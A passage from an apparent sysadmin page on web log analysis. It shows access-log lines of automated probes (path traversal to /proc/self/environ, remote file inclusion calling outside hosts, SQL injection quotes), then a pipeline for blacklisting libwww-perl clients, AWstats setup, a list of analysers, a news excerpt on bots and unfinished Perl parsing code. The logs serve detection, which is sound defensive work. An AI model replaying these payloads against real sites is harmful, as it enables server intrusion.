91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803"
91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803"
91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803"
62.193.242.164 - - [16/Aug/2010:08:03:41 -0600] "GET /Social/Toxic_managers/Micromanagers/fighting_micromanagers.shtml HTTP/1.1" 500 811 "-" "libwww-perl/5.813"
62.193.242.164 - - [16/Aug/2010:08:03:43 -0600] "GET /Social/Toxic_managers/Micromanagers/fighting_micromanagers.shtml HTTP/1.1" 500 811 "-" "libwww-perl/5.813"
209.190.190.5 - - [16/Aug/2010:08:08:36 -0600] "GET /Tools/tr.shtml HTTP/1.0" 500 761 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14FM SSL-MM/1.4.1 OpenSSL/0.9.7d-dev"
186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805"
186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /DB/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805"
186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /DB/index.shtml/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805"
186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
222.122.13.12 - - [16/Aug/2010:08:57:05 -0600] "GET /Scripting/php.shtml/errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:08:57:05 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /Scripting/errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:08:57:07 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79"
109.86.145.204 - - [16/Aug/2010:09:48:06 -0600] "GET /Malware/Malicious_web/Bulletin/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810"
109.86.145.204 - - [16/Aug/2010:09:48:07 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
109.86.145.204 - - [16/Aug/2010:09:48:07 -0600] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810"
109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /Malware/Malicious_web/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810"
109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
74.8.102.118 - - [16/Aug/2010:10:10:24 -0600] "GET /Tools/tr.shtml HTTP/1.0" 500 761 "-" "Lynx/2.8.7dev.2 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d"
222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 826 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /Solaris/oss_for_solaris.shtml/load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 826 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /Solaris/load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 826 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79"
84.242.142.98 - - [16/Aug/2010:11:42:34 -0600] "GET /Solaris/Security/solaris_root_password_recovery.shtml////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 302 808 "-" "libwww-perl/5.65"
84.242.142.98 - - [16/Aug/2010:11:42:34 -0600] "GET /400.shtml?_SERVER%5bDOCUMENT_ROOT%5d=http://genol.fileave.com/MC22.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.65"
84.242.142.98 - - [16/Aug/2010:11:42:35 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 747 "-" "libwww-perl/5.65"
84.242.142.98 - - [16/Aug/2010:11:42:35 -0600] "GET /Solaris/Security////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 767 "-" "libwww-perl/5.65"
84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET /Solaris/Security/solaris_root_password_recovery.shtml////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 302 808 "-" "libwww-perl/5.65"
84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET /400.shtml?_SERVER%5bDOCUMENT_ROOT%5d=http://genol.fileave.com/MC22.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.65"
84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 747 "-" "libwww-perl/5.65"
84.242.142.98 - - [16/Aug/2010:11:42:37 -0600] "GET /Solaris/Security////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 767 "-" "libwww-perl/5.65"
203.147.62.92 - - [16/Aug/2010:12:21:15 -0600] "GET /Scripting/php.shtml/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /Scripting/php.shtml/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /Scripting/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /Scripting/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
194.146.226.69 - - [16/Aug/2010:12:26:19 -0600] "GET /index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834"
194.146.226.69 - - [16/Aug/2010:12:26:19 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834"
194.146.226.69 - - [16/Aug/2010:12:28:51 -0600] "GET /Admin/Tivoli/TEC/Event_console/index.shtml/index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834"
194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834"
194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834"
194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834"
194.146.226.69 - - [16/Aug/2010:12:28:53 -0600] "GET /Admin/Tivoli/TEC/Event_console/index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834"
194.146.226.69 - - [16/Aug/2010:12:28:53 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834"
77.243.239.121 - - [16/Aug/2010:12:41:05 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:06 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:36 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:38 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:38 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:41:39 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:41:39 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:48 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:48 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:24 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:24 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
89.111.176.226 - - [16/Aug/2010:12:42:29 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:42:29 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:42:38 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:42:39 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:42:39 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:43:40 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:43:41 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"

What these records have in common is the libwww-perl user agent. Grepping for the string libwww gives a more complete picture. Generally these are "blind probes" used by script kiddies looking for an exploitable vulnerability.

Extracting the IP addresses gives you a first draft of a "blacklist", and the top dozen addresses can be used to block those rogue clients from accessing your site. To get such a "dirty dozen" you can use a simple pipe, which can be turned into a shell function or script:

grep libwww "$1" | cut -d' ' -f1 | sort | uniq -c | sort -rn | head -12 > "$1.dirty"
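The same "dirty dozen" can be computed in Perl without the pipe. A minimal sketch, assuming the client IP is the first space-separated field of each line, as in the samples above; the script name dirty_dozen.pl and the function top_ips are hypothetical:

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Count client IPs (first field) on lines containing $pattern and return
# the $n most frequent as [count, ip] pairs, busiest first.
sub top_ips {
    my ($lines, $pattern, $n) = @_;
    my %hits;
    for my $line (@$lines) {
        next unless index($line, $pattern) >= 0;    # grep libwww
        my ($ip) = split ' ', $line;                # cut -d' ' -f1
        $hits{$ip}++ if defined $ip;                # sort | uniq -c
    }
    # sort -rn | head -12; ties are broken by IP so the order is stable
    my @top = sort { $hits{$b} <=> $hits{$a} || $a cmp $b } keys %hits;
    splice(@top, $n) if @top > $n;
    return map { [ $hits{$_}, $_ ] } @top;
}

# Usage: perl dirty_dozen.pl access_log > access_log.dirty
if (@ARGV) {
    my @lines = <>;
    printf "%7d %s\n", @$_ for top_ips(\@lines, 'libwww', 12);
}
```

Unlike the shell pipe, equal counts are ordered by IP address, so repeated runs on the same log give identical output.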

Below are the results of processing the list above, with the host name of each address shown in the third column:

20	83.149.125.174	home.w-sieci.pl
18	80.67.20.21	mayermail.de
12	200.69.222.122	contactar01.gestionarnet.com
11	64.78.163.2	nickentgolf.com
11	62.193.224.166	wpc0230.amenworld.com
10	86.109.161.201	lincl239.ns1.couldix.com
 9	87.230.2.113	lvps87-230-2-113.dedicated.hosteurope.de
 9	85.214.55.73	mind-creations.net
 7	193.192.249.157	
 6	87.118.96.254	ns.km22206-02.keymachine.de
 6	72.55.153.108	ip-72-55-153-108.static.privatedns.com
 6	66.147.239.104	host.1sbs.com
 6	216.246.52.59	server.dynasoft.com.ph
 6	213.195.77.225	225.77.195.213.ibercom.com
 5	217.115.197.51	node11.cluster.nxs.nl
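The pipe prints only counts and addresses; the host names in the third column were presumably obtained by reverse DNS lookup. A sketch that appends such names to "count ip" lines, using Perl's built-in gethostbyaddr together with the core Socket module (the script name add_names.pl and the function reverse_name are hypothetical):

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Socket qw(inet_aton AF_INET);

# Return the reverse DNS name of a dotted-quad IPv4 address, or '' when the
# string is not an IPv4 address or the lookup finds no name.
sub reverse_name {
    my ($ip) = @_;
    return '' unless defined $ip && $ip =~ /^\d{1,3}(?:\.\d{1,3}){3}$/;
    my $packed = inet_aton($ip) or return '';
    my $name = gethostbyaddr($packed, AF_INET);
    return defined $name ? $name : '';
}

# Usage: perl add_names.pl access_log.dirty
# Turns "count ip" lines into tab-separated "count ip hostname" lines.
if (@ARGV) {
    while (my $line = <>) {
        my ($count, $ip) = split ' ', $line;
        next unless defined $ip;
        print join("\t", $count, $ip, reverse_name($ip)), "\n";
    }
}
```

Addresses without a PTR record get an empty third column, like 193.192.249.157 in the table above.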

AWstats

There are a lot of free HTTP log file analysis tools, many of them written in Perl, that haven't been updated since the mid-90s. AWstats is one of the few well-written scripts that is both free and up to date.

It looks a bit like WebTrends (though I haven't used WebTrends in several years). AWstats can be used with several web servers, including IIS and Apache. You can either generate static HTML files or run it as a Perl script in the cgi-bin directory.

Here's a quick rundown of setting it up on Unix/Apache:

Each virtual web site you want to track should have a file /etc/awstats.sitename.conf. The directives for the configuration file are documented at http://awstats.sourceforge.net/docs/awstats_config.html. A default configuration file, cgi-bin/awstats.model.conf, is also provided; you can use it as a base.

Make sure your log files use the NCSA combined format. In Apache this is usually done with the directive CustomLog /logs/access.log combined. You can use other formats, but then you have to customize the LogFormat setting in the AWstats conf file.
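To check whether an existing log really is in combined format before pointing AWstats at it, you can count how many lines match the combined layout. A rough sketch; the regex is an approximation written for this example (it does not handle escaped quotes inside the request, for instance), and check_format.pl is a hypothetical name:

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Approximate NCSA combined layout:
# host ident authuser [date] "request" status bytes "referer" "user-agent"
my $COMBINED = qr/^\S+ \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} (?:\d+|-) "[^"]*" "[^"]*"\s*$/;

sub is_combined {
    my ($line) = @_;
    return $line =~ $COMBINED ? 1 : 0;
}

# Usage: perl check_format.pl /logs/access.log
if (@ARGV) {
    my ($total, $ok) = (0, 0);
    while (my $line = <>) {
        $total++;
        $ok += is_combined($line);
    }
    printf "%d of %d lines look like combined format\n", $ok, $total;
}
```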

You will probably want to edit these directives: LogFile, which points to where your log file is stored; SiteDomain, the main domain for the site; HostAliases, which lists other domains for the site; and DirData, which specifies where the AWstats databases are stored (each site gets its own file in that directory).
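The LogFile directive is also a natural place to hook in the pre-filtering discussed earlier on this page: AWstats accepts a command ending with a pipe character as LogFile, so a filter can drop obvious bot traffic before it reaches the statistics. A minimal sketch that removes libwww-perl requests; the script name prefilter.pl, its location, and the pattern list are assumptions to adapt to your own logs:

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Patterns for requests to drop before AWstats sees them (an assumption:
# extend this list with whatever bots pollute your own logs).
my @DROP = (qr/libwww-perl/);

sub keep_line {
    my ($line) = @_;
    for my $re (@DROP) {
        return 0 if $line =~ $re;
    }
    return 1;
}

# Usage: perl prefilter.pl /logs/access.log   (prints only the kept lines)
if (@ARGV) {
    while (my $line = <>) {
        print $line if keep_line($line);
    }
}
```

In the site's conf file this could then be referenced as LogFile="perl /path/to/prefilter.pl /logs/access.log |" (paths hypothetical).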

Once that is set up, update the database from the command line by running:

perl awstats.pl -config=sitename -update

Now copy everything in the wwwroot folder to a web root and visit http://sitename.com/cgi-bin/awstats.pl. To view other domains, use /cgi-bin/awstats.pl?config=othersitename.

Here sitename (or othersitename) is the name used in the config file awstats.sitename.conf.

If you want to generate static HTML files, run the awstats_buildstaticpages.pl script found in the tools folder. You have to give it the path to the awstats.pl Perl script and a directory to put the static HTML files in.

perl awstats_buildstaticpages.pl -config=sitename -awstatsprog=/web/cgi-bin/awstats.pl \
  -dir=/web/stats/sitename/

More setup info can be found here: http://awstats.sourceforge.net/docs/index.html

If you are looking for a Squid log analyzer in Perl, Calamaris is one to try. See also Proxy log analysers.

There are plenty of simple Perl scripts for log processing on the Web nowadays. See for example Unix Log Analysis.

Name	Platform	Cost	Available from	Notes
3Dstats	UNIX	free	Netstore
Analog	Mac, Windows, Unix	free	http://www.analog.cx/	Mac version also available from summary.net
BrowserCounter	UNIX	free	Benjamin "Snowhare" Franz
eXTReMe Tracking	Any (online service)	free	eXTReMe Tracking	Unique visitors, referrers, browser, geographical location... No traffic limitation
FTPWebLog	UNIX	free	Benjamin "Snowhare" Franz
iisstat	UNIX	free	Lotus Development Corporation
pwebstat	Unix (requires perl5 + fly)	free	Martin Gleeson
RefStats	UNIX	free	Benjamin "Snowhare" Franz
Relax	Unix, Windows	free (GPL)	ktmatu	Perl 5 script for referrer and search engine keyword analysis.
Webalizer	Unix	free (GPL)	Bradford L Barrett	Supports common logfile format & variations of combined logfile format, partial logs & multiple languages.
wwwstat	UNIX	free	Roy Fielding
W3Perl	Unix, Windows	free (GPL)	Laurent Domisse


NEWS CONTENTS

Old News ;-)

[Dec 27, 2014] Bots Now Outnumber Humans on the Web By ROBERT MCMILLAN

Dec 18 2014 |

<http://www.wired.com/2014/12/bots-now-outnumber-humans-web/>

Diogo Mónica once wrote a short computer script that gave him a secret weapon in the war for San Francisco dinner reservations.

This was early 2013. The script would periodically scan the popular online reservation service, OpenTable, and drop him an email anytime something interesting opened up - a choice Friday night spot at the House of Prime Rib, for example. But soon, Mónica noticed that he wasn't getting the tables that had once been available.

By the time he'd check the reservation site, his previously open reservation would be booked. And this was happening crazy fast. Like in a matter of seconds. "It's impossible for a human to do the three forms that are required to do this in under three seconds," he told WIRED last year.

Mónica could draw only one conclusion: He'd been drawn into a bot war.

Everyone knows the story of how the world wide web made the internet accessible for everyone, but a lesser-known story of the internet's evolution is how automated code (aka bots) came to quietly take it over. Today, bots account for 56 percent of all website visits, says Marc Gaffan, CEO of Incapsula, a company that sells online security services. Incapsula recently ran an analysis of 20,000 websites to get a snapshot of part of the web, and on smaller websites, it found that bot traffic can run as high as 80 percent.

People use scripts to buy gear on eBay and, like Mónica, to snag the best reservations. Last month, the band Foo Fighters sold tickets for their upcoming tour at box offices only, an attempt to strike back against the bots used by online scalpers. "You should expect to see it on ticket sites, travel sites, dating sites," Gaffan says. What's more, a company like Google uses bots to index the entire web, and companies such as IFTTT and Slack give us ways to use bots for good, personalizing our internet and managing the daily informational deluge.

But, increasingly, a slice of these online bots are malicious, used to knock websites offline, flood comment sections with spam, or scrape sites and reuse their content without authorization. Gaffan says that about 20 percent of the Web's traffic comes from these bots. That's up 10 percent from last year.

Often, they're running on hacked computers. And lately they've become more sophisticated. They are better at impersonating Google, or at running in real browsers on hacked computers. And they've made big leaps in breaking human-detecting captcha puzzles, Gaffan says.

"Essentially there's been this evolution of bots, where we've seen it become easier and more prevalent over the past couple of years," says Rami Essaid, CEO of Distil Networks, a company that sells bot-blocking software.

But despite the rise of these bad bots, there is some good news for the human race. The total percentage of bot-related web traffic is actually down this year from what it was in 2013. Back then it accounted for 60 percent of the traffic, 4 percent more than today.

[Feb 07, 2012] Perl for Web Site Management Chapter 8 Parsing Web Access Logs

Now that the hostname lookups are taken care of, it's time to write the log-analysis script. Example 8-2 shows the first version of that script.

Example 8-2: log_report.plx, a web log-analysis script (first version)

#!/usr/bin/perl -w
 
# log_report.plx
 
# report on web visitors
 
use strict;
 
while (<>) {
    my ($host, $ident_user, $auth_user, $date, $time,
            $time_zone, $method, $url, $protocol, $status, $bytes) = 
        /^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] "(\S+) (.+?) (\S+)" (\S+) (\S+)$/;
 
    print join "\n", $host, $ident_user, $auth_user, $date, $time,
        $time_zone, $method, $url, $protocol, $status,
        $bytes, "\n";
}

This first version of the script is simple. All it does is read in lines via the <> operator, parse those lines into their component pieces, and then print out the parsed elements for debugging purposes. The line that does the printing out is interesting, in that it uses Perl's join function, which you haven't seen before. The join function is the polar opposite, so to speak, of the split function: it lets you specify a string (in its first argument) that will be used to join the list comprising the rest of its arguments into a scalar. In other words, the Perl expression join '-', 'a', 'b', 'c' would return the string a-b-c. And in this case, using \n to join the various elements parsed by our script lets us print out a newline-separated list of those parsed items.
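One limitation worth knowing: the pattern in Example 8-2 is anchored with $ right after the bytes field, so it matches only Common Log Format lines. Combined-format lines, like the libwww-perl samples at the top of this section, fail to match and leave every field undefined. A sketch of a variant that makes the trailing referrer and user-agent fields optional (parse_line and parse_both.pl are hypothetical names):

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Example 8-2's pattern with the combined format's referrer and user-agent
# fields added as an optional group, so both log formats parse.
my $LOG_RE = qr/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] "(\S+) (.+?) (\S+)" (\S+) (\S+)(?: "([^"]*)" "([^"]*)")?$/;

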